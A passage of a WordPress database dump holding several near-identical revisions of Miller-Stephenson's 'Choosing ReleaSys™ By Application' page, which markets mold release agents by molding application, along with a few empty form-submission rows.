link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n[/col]\r\n<p><a name="rubber"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n<p><a name="injection"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n<p><a name="fiber"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="concrete"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n<p><a name="custom"></a></p>\r\n[ux_image id="4430"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable of developing a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:29:19', '2017-06-08 18:29:19', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4533, 2, '2017-06-08 18:29:56', '2017-06-08 18:29:56', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER" link="#rubber"]\r\n\r\n[button text="INJECTION PLASTICS" link="#injection"]\r\n\r\n[button text="FIBERGLASS" link="#fiber"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE" link="#concrete"]\r\n\r\n[button text="CUSTOM FORMULATIONS" link="#custom"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n<p><a name="polyurethane"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver a superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high-performance chemistry adheres tenaciously to mold surfaces such as aluminum, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n[/col]\r\n<p><a name="rubber"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n<p><a name="injection"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n<p><a name="fiber"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="concrete"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="custom"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable of developing a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:29:56', '2017-06-08 18:29:56', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4534, 2, '2017-06-08 18:32:37', '2017-06-08 18:32:37', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n<p><a name="advanced composites"></a></p>\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\n\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\n\n[button text="POLYURETHANE" link="#polyurethane"]\n\n[button text="RUBBER-SILICONE-ELASTOMER" link="#rubber"]\n\n[button text="INJECTION PLASTICS" link="#injection"]\n\n[button text="FIBERGLASS" link="#fiber"]\n\n[button text="PRECAST / REINFORCED CONCRETE" link="#concrete"]\n\n[button text="CUSTOM FORMULATIONS" link="#custom"]\n\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n<p><a name="rotational plastics"></a></p>\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n<p><a name="polyurethane"></a></p>\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver a superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high-performance chemistry adheres tenaciously to mold surfaces such as aluminum, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n<p><a name="rubber"></a></p>\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n<p><a name="injection"></a></p>\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n<p><a name="fiber"></a></p>\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n<p><a name="concrete"></a></p>\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinforced Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n<p><a name="custom"></a></p>\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable of developing a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:32:37', '2017-06-08 18:32:37', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4535, 0, '2017-06-08 19:21:31', '2017-06-08 19:21:31', '', '', '', 'publish', 'closed', 'closed', '', '4535', '', '', '2017-06-08 19:21:31', '2017-06-08 19:21:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/4535/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4536, 0, '2017-06-08 20:10:14', '2017-06-08 20:10:14', '', '', '', 'publish', 'closed', 'closed', '', '4536', '', '', '2017-06-08 20:10:15', '2017-06-08 20:10:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/4536/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4537, 0, '2017-06-09 11:08:25', '2017-06-09 11:08:25', '', '', '', 'publish', 'closed', 'closed', '', '4537', '', '', '2017-06-09 11:08:26', '2017-06-09 11:08:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/4537/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4538, 2, '2017-06-09 13:00:20', '2017-06-09 13:00:20', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n<p><a name="advanced composites"></a></p>\n[button text="ADVANCED COMPOSITES" size="small" link="#advanced composites"]\n\n[button text="ROTATIONAL PLASTIC" size="small" link="#rotational plastics"]\n\n[button text="POLYURETHANE" size="small" link="#polyurethane"]\n\n[button text="RUBBER-SILICONE-ELASTOMER" size="small" link="#rubber"]\n\n[button text="INJECTION PLASTICS" size="small" link="#injection"]\n\n[button text="FIBERGLASS" size="small" link="#fiber"]\n\n[button text="PRECAST / REINFORCED CONCRETE" size="small" link="#concrete"]\n\n[button text="CUSTOM FORMULATIONS" size="small" link="#custom"]\n\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n<p><a name="rotational plastics"></a></p>\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n<p><a name="polyurethane"></a></p>\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver a superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high-performance chemistry adheres tenaciously to mold surfaces such as aluminum, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n<p><a name="rubber"></a></p>\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n<p><a name="injection"></a></p>\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n<p><a name="fiber"></a></p>\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" 